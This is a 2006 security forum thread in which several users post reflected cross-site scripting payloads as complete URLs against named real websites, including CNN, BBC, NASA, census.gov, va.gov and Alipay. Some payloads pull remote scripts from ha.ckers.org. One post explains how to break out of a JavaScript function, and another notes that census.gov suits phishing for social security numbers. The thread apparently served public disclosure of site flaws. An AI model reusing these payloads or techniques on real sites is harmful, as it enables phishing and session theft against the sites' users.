Kyran, it's now located at http://ha.ckers.org/s.js :)

- RSnake
Gotta love it. http://ha.ckers.org

Here is a good example of my post earlier regarding <style> tags disallowing the rest of the page to show.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cstyle%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA


This is without the style tag.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA

But of course, if there is a closing style tag everything after it will still show.


Edit - Thanks for that rsnake! :D

- Kyran



Edited 1 time(s). Last edit at 09/24/2006 09:22PM by Kyran.

http://www.cbs.com/excedrin/register.php?mpid=2691&success_page=thankyou.php&action=create&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&password2=&firstname=&lastname=&address1=&city=&state=&zip=&country=&birthdate=%2F%2F&birthmonth=&birthday=&birthyear=&phone=&email=&previous_email=&ireadtherules=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

http://rzr.online.fr/docs/search/redir.php?url=a</title><script>alert(String.fromCharCode(88,83,83))</script>
http://www.nationalcrediteducationweek.com/redirect.aspx?redir=delayedXSS';alert('XSS');t%20=' <--delayed xss by 5seconds..
http://www.nscp.org/cgi-bin/leave.pl?redir=google.com/<script>alert('XSS')</script> xss then redirect.. although can be overwritten if you want
http://www.dmas.virginia.gov/pr-provider_no.asp?redir=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb

-maluc



Edited 3 time(s). Last edit at 09/25/2006 12:13AM by maluc.

http://www.innovations.va.gov/innovations/docs/notva.cfm?redir=');%7Dalert('XSS');if(1==0)%7B//

this is a rather interesting javascript injection: ');}alert('XSS');if(1==0){//

the function it's injected into looks like:

function openClose(){
window.open('http://INPUTHERE','');
window.close();
}

the '); breaks out of the window.open .. and since this function is only called when pressing the "continue" button .. the } breaks out of the function. Then any javascript can freely be added, but we need to clean up the remainder:

,'');
window.close();
}

The .''); is commented out using the // .. and the { to match the right-hand bracket. The script now works, but if we don't want it to close immediately (because of window.close), we can use an impossible condition to prevent it - the if(1==0){ }

it's nothing difficult, just funky looking

-maluc

Hah. That's quite neat.

- Kyran

http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3C/b
http://www.opic.gov/leaving.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b
https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_alp.php?p_sid=5tkbkvii&p_lva=&p_li=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&p_search_text=a%22%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E&p_new_search=1 <--the " gets translated to &quot; in IE only (tested on IE7 though).. works fine in Firefox

someone less tired than i, can do more testing to see where i'm screwing up.. census.gov is a great excuse to ask people for their social security numbers, etc. ..

-maluc



Edited 2 time(s). Last edit at 09/25/2006 03:47AM by maluc.

http://columbiaredi.com/redirect.php?url='%20onmouseover=alert('XSS')%20style='-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)%27 mouseover the Continue link in IE .. auto in FF

-maluc

http://www.dotcr.ost.dot.gov/asp/redirect.asp?url=zomg%20XSS%3Cscript%3Ealert('XSS')%3C/script%3E <--need to overwrite meta to prevent redirect
http://www.mbda.gov/redirect.php?url='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b

-maluc



Edited 1 time(s). Last edit at 09/25/2006 03:23AM by maluc.

http://www.friendsreunited.co.uk/FriendsReunited.asp?wci=forgotton&member_email=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E&error=Y

http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E

We've been slashdotted! Sneaky bastards deep linking to .php files! http://it.slashdot.org/it/06/09/25/1440220.shtml Performance has degraded massively... Expect some outages today... sorry about that folks!

- RSnake
Gotta love it. http://ha.ckers.org

The darkreading article has been syndicated on Doctor Dobb's journal as well: http://www.ddj.com/dept/security/193005254

Keep up the good work guys!

- RSnake
Gotta love it. http://ha.ckers.org

Borrowed from Maluc's redirect list and turned into XSS: http://www.freeml.com/servlet/redir?rd=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

Nice! Slashdotted.

rsnake, that last one is mean. Even if scripts are disabled it auto-refreshes over and over.

- Kyran

That's easy to get rid of if you want, I just didn't bother as a POC. :)

- RSnake
Gotta love it. http://ha.ckers.org

I would assume using javascript to edit it? I can't see any html way to do so.

- Kyran

Yah, not using this example (since there is some logic built into it to stop this) but if you redirect to #whatever I don't think meta refresh will cause the whole thing to re-load since whateverpageyouon.html#whatever causes the page to refresh. But you're right I was talking about using document.write or a javascript: directive.

ddj.com and darkreading.com listed the companies, probably siteadvisor.com needs to change their "green" to "red" for those. Try yourself:

http://www.siteadvisor.com/lookup/?q='%20onmouseover=%22alert('want%20to%20add%20whatever%20you%20like')%22%3E

currently a bit anoying 'cause you have to use your mouse, but works anyway ;-)

*sigh* You have a very good point (funny XSS but very real issue). But how can they really analyize these types of sites without taking into account XSS based phishing attacks?

- RSnake
Gotta love it. http://ha.ckers.org

.. if you manage to inject an iframe .. or loading into the DOM ..

outch:

http://www.breach.com/news_press_detail.asp?id=42-0

Both are trivial if you have JavaScript on the page already. I wonder what tools they use to vett these websites... It seems like they are mostly worried about distribution of malware or spam, both of which could happen via XSS defacement/phishing.

- RSnake
Gotta love it. http://ha.ckers.org

http://audience.cnn.com/services/cnn/memberservices/member_auth.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://www.bbc.co.uk/cgi-perl/signon/mainscript.pl?c=login&service=mbhealth&ptrt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Big auction site in China: http://search1.taobao.com/browse/0/t-g,ei7dy43dojuxa5b6mfwgk4tufarfqu2teiutyl3tmnzgs4duhy----------------40-list-commend-0-all-0.htm

And their payment processor: https://www.alipay.com/user/user_register.htm?support=000000&_fmu.u._0.e=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_fmu.u._0.e=&_fmu.u._0.q=&_fmu.u._0.qu=&_fmu.u._0.pa=&_fmu.u._0.pay=&_fmu.u._0.p=%CE%D2%B0%D6%B0%D6%C2%E8%C2%E8%B5%C4%C3%FB%D7%D6%B8%F7%CA%C7%CA%B2%C3%B4&_fmu.u._0.o=&_fmu.u._0.pr=&_fmu.u._0.u=2&_fmu.u._0.f=&_fmu.u._0.r=&_fmu.u._0.ca=%C9%ED%B7%DD%D6%A4&_fmu.u._0.car=&_fmu.u._0.c=&_fmu.u._0.re=alipay&action=register_action&event_submit_do_register=anything&Submit=%CD%AC%D2%E2%D2%D4%CF%C2%CC%F5%BF%EE%A3%AC%B2%A2%C8%B7%C8%CF%D7%A2%B2%E1

- RSnake
Gotta love it. http://ha.ckers.org

http://www.clickbank.com/marketplace.html?method=Sort&s=&c=-1&subc=-1&keywords=%22%3E%3Cscript%3Ealert+%28%27xss%27%29%3C%2Fscript%3E&sortBy=popularity&i=10

- Kyran

This is just silly. You search for XSS, you XSS them
http://www.altavista.com/web/results?&q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%22Ownage+by+Acidus%22%29%3C%2Fscript%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org

http://search.netscape.com/ns/search?query=%27%29%3Balert%28%27xss&st=webresults&fromPage=NSCPResultsT

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Another CNN issue. Multiple reflections for a single attack string, so if you seriously exploit it you'll need to put in a variable flag

http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?url=%22%3E%3Cscript%3Ealert(%220wnage%20by%20Acidus%22)%3C/script%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org